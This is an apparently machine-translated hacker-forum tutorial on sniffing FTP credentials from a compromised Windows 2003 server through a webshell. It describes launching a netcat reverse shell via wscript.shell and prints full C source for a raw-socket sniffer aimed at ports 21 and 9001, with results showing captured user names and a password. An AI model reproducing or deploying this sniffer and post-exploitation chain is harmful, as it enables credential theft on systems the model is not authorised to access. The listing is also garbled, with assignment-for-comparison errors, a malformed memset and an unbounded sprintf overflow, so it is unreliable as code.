Feasibility Study of sniffer Based on Webshell (figure)

Source: Internet
Author: User

Preface:

Phantom Mix's modification of flashsky's port-reuse sniffer for Serv-U could not be made to work on a Windows 2003 server in my tests. I don't know the specifics — I am not sure whether my steps were correct — but I never succeeded.

I built a test environment and tried it with a sniffer program I wrote myself. It uses raw sockets for sniffing; ARP-based sniffing would require installing WinPcap, which is out of the question under low privileges.

Lab environment:

Windows2003 SERVER + ocean 2006 + serv-u5.2

The server does not allow cmd.exe to be run directly, but the wscript.shell component can be used to execute commands after uploading.

Tutorial steps:

1. Execute the nc rebound using wscript.shell to get the shell

2. Use a self-written tool for sniffing (I only sniff ports 21 and 9001: 21 is FTP and 9001 is the bounce port)

/*------------------------------------------------------

* FIle: SnifferFtp. c

* Effect: used for sniffing experiments in webshell, based on Raw

* Code: Huai_Huai

* Page: Http: // hhuai.cn

* Date: 2006.1.12

*-----------------------------------------------------*/

# Include <stdio. h>

# Include <string. h>

# Include "Winsock2.h"

# Pragma comment (lib, "WS2_32.lib ")

# Define SIO_RCVALL _ WSAIOW (IOC_VENDOR, 1)

# Define STATUS_FAILED 0 xFFFF

# Define MAX_PACK_LEN 65535

# Define MAX_ADDR_LEN 16

# Define MAX_HOSTNAME_LEN 255

// Define the ip Header

// IPv4 header as laid out on the wire. Multi-byte fields are kept as byte
// arrays and assembled by hand (big-endian) where they are read in main().
Typedef struct _ iphdr

{

Byte ver_len; // version (high 4 bits) and header length (low 4 bits, in 32-bit words); main() reads the low nibble * 4

Byte type; // type of service, 8 bits

Byte length [2]; // total length of the datagram in bytes, 16 bits big-endian (length[0] * 0x100 + length[1] in main())

// A datagram longer than 65535 bytes cannot be represented and is treated as damaged.

Byte id [2]; // identification, 16 bits

Byte flag_offset [2]; // flags (3 bits) and fragment offset (13 bits)

Byte time; // time to live, 8 bits

Byte protocol; // protocol number, 8 bits; compared against PROTOCOL_TCP in main()

Byte crc_val [2]; // header checksum, 16 bits

Byte src_addr [4]; // source address, 32 bits

Byte tar_addr [4]; // destination address, 32 bits

Byte options [4]; // options and padding. NOTE(review): fixed at 4 bytes here, so sizeof(IP_HEADER) is not a valid header length; the code derives it from ver_len instead.

} IP_HEADER;

// TCP header as laid out on the wire. Only the port fields and
// offset_reser_con are read by main(); the rest is never touched.
Typedef struct _ tcphdr

{

Byte source_port [2]; // source port, 16 bits big-endian

Byte dest_port [2]; // destination port, 16 bits big-endian

Byte sequence_no [4]; // sequence number, 32 bits

Byte ack_no [4]; // acknowledgement number, 32 bits

Unsigned char offset_reser_con; // data offset (high 4 bits, in 32-bit words) plus reserved bits. NOTE(review): main() appears to shift this whole byte right by 2 to get the header length in bytes; that only equals (offset >> 4) * 4 when the reserved bits are zero.

Unsigned char th_flag; // control flags byte; not used in this listing

Byte window [2]; // window size, 16 bits

Byte checksum [2]; // checksum, 16 bits

Byte urgen_pointer [2]; // urgent pointer, 16 bits

Byte options [3]; // NOTE(review): 3 bytes is not a valid options size; harmless here only because sizeof(TCP_HEADER) is never used.

} TCP_HEADER;

// IP protocol numbers. Only PROTOCOL_TCP is used by the live code in
// main(); ICMP/UDP appear only in the commented-out switch there.
# Define PROTOCOL_ICMP 1 // Internet Control Message Protocol

# Define PROTOCOL_GTG 3 // Gateway-to-Gateway

# Define PROTOCOL_CGMM 4 // CMCC Gateway Monitoring Message

# Define PROTOCOL_ST 5 // ST

# Define PROTOCOL_TCP 6 // Transmission Control Protocol

# Define PROTOCOL_UCL 7 // UCL

# Define PROTOCOL_SECURE 9 // secure

# Define PROTOCOL_BRM 10 // bbn rcc Monitoring

# Define PROTOCOL_NVP 11 // NVp

# Define PROTOCOL_PUP 12 // PUP

# Define PROTOCOL_PLURIBUS 13 // Pluribus

# Define PROTOCOL_TELENET 14 // Telenet

# Define PROTOCOL_XNET 15 // XNET

# Define PROTOCOL_CHAOS 16 // Chaos

# Define PROTOCOL_UDP 17 // UDP

# Define PROTOCOL_MULTIPLEXING 18 // Multiplexing

# Define PROTOCOL_DCN 19 // DCN

# Define PROTOCOL_TAC_MONITORING 20 // TAC Monitoring

# Define protocol_a163 // any local network (name and value garbled in transcription)

# Define PROTOCOL_SATNET 64 // SATNET and Backroom EXPAK

# Define PROTOCOL_MITSS 65 // MIT Subnet Support

# Define PROTOCOL_SATNET_MONIT 69 // SATNET Monitoring

# Define PROTOCOL_IPCU 71 // Internet Packet Core Utility

# Define PROTOCOL_BK_SATNET_MONI 76 // Backroom SATNET Monitoring

# Define PROTOCOL_WIDEBAND_MONI 78 // WIDEBAND Monitoring

# Define PROTOCOL_WIDEBAND_EXPAK 79 // WIDEBAND EXPAK

SOCKET SocketRaw; // file-scope raw socket: opened by startsniffer(), read by ReceiveBuf(); never closed on the normal path

/*
 * startsniffer(): initialises Winsock, creates a SOCK_RAW/IPPROTO_IP
 * socket in the global SocketRaw, binds it to the host's first resolved
 * address and switches it to receive-all mode with SIO_RCVALL.
 *
 * Error handling: every failure prints a message and calls Exit (0),
 * i.e. a success status even though the call failed, and WSACleanup is
 * never called.
 *
 * NOTE(review): on Windows, creating a SOCK_RAW socket and issuing
 * SIO_RCVALL are documented as requiring membership in the local
 * Administrators group, so this step will fail from a low-privilege
 * account; a raw socket or SIO_RCVALL request from an unexpected
 * account is itself a useful detection signal for defenders.
 */
Void startsniffer ()

{

Char RecvBuf [MAX_PACK_LEN] = {0 }; // unused in this function; main() has its own buffer

Char FAR name [MAX_HOSTNAME_LEN];

WSADATA wsa;

Struct hostent FAR * pHostent;

SOCKADDR_IN sa;

DWORD OutBuffer [10];

DWORD InBuffer = 1; // 1 = enable receive-all mode

DWORD BytesReturned = 0;

If (WSAStartup (MAKEWORD (2, 2), & wsa )! = 0)

{

Printf ("Winsock DLL cannot be loaded! ");

Exit (0 ); // NOTE(review): exits with status 0 on failure

}

SocketRaw = socket (AF_INET, SOCK_RAW, IPPROTO_IP );

If (SocketRaw = INVALID_SOCKET) // NOTE(review): as printed this is an assignment, not a comparison (likely a transcription error for ==)

{

Printf ("cannot create Socket! ");

Exit (0 );

}

Gethostname (name, MAX_HOSTNAME_LEN ); // return value not checked

// Result points at library-owned memory; the caller must not free it.

PHostent = gethostbyname (name );

Sa. sin_family = AF_INET;

Sa. sin_port = htons (6000 ); // port for the raw-socket bind; its significance is not established by this code

// NOTE(review): pHostent is dereferenced without a NULL check; a failed
// lookup crashes here.

Memcpy (& sa. sin_addr.S_un.S_addr, pHostent-> h_addr_list [0], pHostent-> h_length );

If (bind (SocketRaw, (PSOCKADDR) & sa, sizeof (sa ))! = 0)

{

Printf ("cannot bind Nic! ");

Closesocket (SocketRaw );

Exit (0 );

}

// Switch the bound interface to receive-all mode so that traffic not
// addressed to this socket is delivered to it.

If (WSAIoctl (SocketRaw, SIO_RCVALL, & InBuffer, sizeof (InBuffer ),

& OutBuffer, sizeof (OutBuffer), & BytesReturned, NULL, NULL )! = 0)

{

Printf ("WSAIoctl cannot be created! ");

Closesocket (SocketRaw );

Exit (0 );

}

}

/*
 * ReceiveBuf(): thin wrapper around recv() on the global SocketRaw.
 * Returns whatever recv() returns (byte count, 0, or SOCKET_ERROR);
 * the caller in main() only acts on results > 0.
 */
Int ReceiveBuf (byte * buf, int len)

{

Return recv (SocketRaw, (char *) buf, len, 0 );

}

/*
 * main(): calls startsniffer(), then loops forever receiving raw IP
 * datagrams. For each TCP segment whose source or destination port is
 * 21 or 9001 it formats several fields into a 16-byte stack buffer and
 * prints the start of the TCP payload. There is no exit path, so the
 * socket is never closed and WSACleanup is never called.
 *
 * NOTE(review): the payload copies at the two Sprintf "% s" calls below
 * write peer-controlled, non-NUL-terminated data into the 16-byte buf
 * with no bound; a single oversized segment overflows the stack frame.
 * Non-standard `Void main`; most compilers accept it but it is not C.
 */
Void main ()

{

Int len;

Byte RecvBuf [65535];

Char buf [16]; // scratch buffer for every Sprintf below

Int iphdr_len;

TCP_HEADER * pTcpHeader;

Unsigned _ int16 src_port;

Unsigned _ int16 dest_port;

Int HdrLen;

_ Int16 datalen; // NOTE(review): signed 16-bit; IP total lengths above 32767 become negative here

IP_HEADER * pIpheader;

Int port1, port2;

Startsniffer ();

While (TRUE)

{

Port1 = port2 = 0;

Memset (RecvBuf ); // NOTE(review): memset takes three arguments; as printed this does not compile (likely lost in transcription)

Len = ReceiveBuf (RecvBuf, 65535 );

If (len> 0)

{

PIpheader = (IP_HEADER *) RecvBuf;

/*

Switch (pIpheader-> protocol)

{

Case PROTOCOL_ICMP:

Printf ("ICMP ");

Break;

Case PROTOCOL_TCP:

Printf ("TCP ");

Break;

Case PROTOCOL_UDP:

Printf ("UDP ");

Break;

Default:

Printf ("other protocols ");

Break;

}

*/

If (pIpheader-> protocol = PROTOCOL_TCP) // NOTE(review): assignment as printed; presumably == was intended

{

Iphdr_len = (pIpheader-> ver_len & 0xf) * 4; // IHL is in 32-bit words; not validated against len

PTcpHeader = (TCP_HEADER *) (RecvBuf + iphdr_len );

Src_port = pTcpHeader-> source_port [0] * 0x100 + pTcpHeader-> source_port [1];

Dest_port = pTcpHeader-> dest_port [0] * 0x100 + pTcpHeader-> dest_port [1];

Memset (buf, 0, 16 );

Sprintf (buf, "% d", src_port ); // result discarded: the matching Printf is commented out

Port1 = src_port;

// Printf ("% s", buf );

Memset (buf, 0, 16 );

Sprintf (buf, "% d", dest_port ); // result discarded as well

Port2 = dest_port;

// Printf ("% s", buf );

// Port filter: FTP control (21) and the author's bounce port (9001).
// NOTE(review): as printed this uses = and | where == and || are meant.

If (port1 = 21 | port2 = 21 | port1 = 9001 | port2 = 9001)

{

HdrLen = (pTcpHeader-> offset_reser_con)> 2; // TCP header length in bytes; correct only while the reserved bits are zero (see TCP_HEADER)

Memset (buf, 0, 16 );

Sprintf (buf, "% s", (BYTE *) pTcpHeader) + HdrLen ); // NOTE(review): unbounded %s from packet payload into 16-byte buf (stack overflow / over-read); result is discarded anyway

// Printf ("% s", buf );

Memset (buf, 0, 16 );

// NOTE(review): with the intended "%d.%d.%d.%d" the longest output is 15 chars + NUL and fits; with the extra spaces as printed it does not.

Sprintf (buf, "% d. % d. % d. % d ", pIpheader-> src_addr [0], pIpheader-> src_addr [1], pIpheader-> src_addr [2], pIpheader-> src_addr [3]);

// Printf ("% s", buf );

Memset (buf, 0, 16 );

Sprintf (buf, "% d. % d. % d. % d ", pIpheader-> tar_addr [0], pIpheader-> tar_addr [1], pIpheader-> tar_addr [2], pIpheader-> tar_addr [3]);

// Printf ("% s", buf );

Datalen = pIpheader-> length [0] * 0x100 + pIpheader-> length [1]; // IP total length, big-endian

Memset (buf, 0, 16 );

Sprintf (buf, "% d", datalen );

// Printf ("% s", buf );

HdrLen = (pTcpHeader-> offset_reser_con)> 2; // recomputed; identical to the value above

Memset (buf, 0, 16 );

Sprintf (buf, "% s", (BYTE *) pTcpHeader) + HdrLen ); // NOTE(review): same unbounded payload copy as above; this is the only one whose output is printed

Printf ("% s", buf );

// Printf ("\ n ");

}

}

}

}

}

3. Sniffing results:

[Screenshot of the sniffing results; the original image markup was garbled and is not reproduced.]

4. Experiment summary:

Some information can indeed be sniffed: on the local machine under WinXP SP2 the FTP password could be captured. On Windows 2003 Server, however, only the user name was sniffed, along with some operations performed through the webshell, such as the user directory.

Our webshell permissions can be very low, as long as wscript.shell is available.

There are many details that still need careful study. I hope the forum experts can offer some tips. (Source: the Evil Information Security Team; Author: Bad)
